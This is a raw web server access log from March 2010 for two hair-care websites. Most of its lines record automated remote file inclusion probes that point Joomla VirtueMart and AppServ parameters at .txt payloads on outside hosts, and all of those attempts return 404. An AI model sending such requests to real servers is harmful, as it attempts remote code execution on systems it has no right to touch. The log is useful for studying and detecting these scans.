190.152.217.250 - - [08/Mar/2010:16:04:41 -0800] "GET /appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:16:04:41 -0800] "GET /logs/access_091214.log%20%20//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:16:04:41 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.189.224.16 - - [08/Mar/2010:16:05:02 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:05:02 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:05:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.39.140.100 - - [08/Mar/2010:16:05:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.39.140.100 - - [08/Mar/2010:16:05:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.39.140.100 - - [08/Mar/2010:16:05:18 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.154.170.203 - - [08/Mar/2010:16:05:25 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]" "growlonghairfast.com"
95.154.170.203 - - [08/Mar/2010:16:05:26 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]" "growlonghairfast.com"
58.150.99.144 - - [08/Mar/2010:16:06:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [08/Mar/2010:16:06:53 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [08/Mar/2010:16:06:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.189.224.16 - - [08/Mar/2010:16:07:17 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:07:17 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:07:17 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.90.103.190 - - [08/Mar/2010:16:10:50 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/9.00 (Windows NT 5.1; U; ru)" "growlonghairfast.com"
66.90.103.190 - - [08/Mar/2010:16:10:52 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/9.00 (Windows NT 5.1; U; ru)" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:13:02 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:13:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:13:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:13:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:13:17 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:13:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:13:28 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:14:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:14:11 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:14:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:14:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:14:27 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:14:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:14:36 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:16:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:16:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:16:55 -0800] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:17:57 -0800] "GET /logs/access_091130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:18:26 -0800] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:18:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:18:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:19:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:19:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:19:08 -0800] "GET /logs/access_100118.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:19:18 -0800] "GET /logs/access_091130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:20:20 -0800] "GET /logs/access_091130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:20:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:20:39 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:20:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:20:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:20:47 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:20:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.205 - - [08/Mar/2010:16:21:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:21:45 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:21:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:22:04 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:22:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:22:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:23:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:23:41 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:23:41 -0800] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:23:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.132 - - [08/Mar/2010:16:23:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:23:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:23:53 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.90.103.190 - - [08/Mar/2010:16:24:16 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "www.freehairsecrets.com"
66.90.103.190 - - [08/Mar/2010:16:24:16 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:24:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:24:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:24:19 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:24:19 -0800] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.205 - - [08/Mar/2010:16:24:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:24:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:24:22 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.132 - - [08/Mar/2010:16:24:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:24:26 -0800] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:24:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.205 - - [08/Mar/2010:16:24:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:24:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.205 - - [08/Mar/2010:16:24:27 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.132 - - [08/Mar/2010:16:24:35 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:24:46 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:24:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:24:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:25:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:25:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [08/Mar/2010:16:25:04 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.132 - - [08/Mar/2010:16:26:45 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.132 - - [08/Mar/2010:16:26:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.55.227.132 - - [08/Mar/2010:16:26:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [08/Mar/2010:16:26:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:26:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:26:53 -0800] "GET /logs/access_091214.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:27:32 -0800] "GET /logs/access_091130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [08/Mar/2010:16:28:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
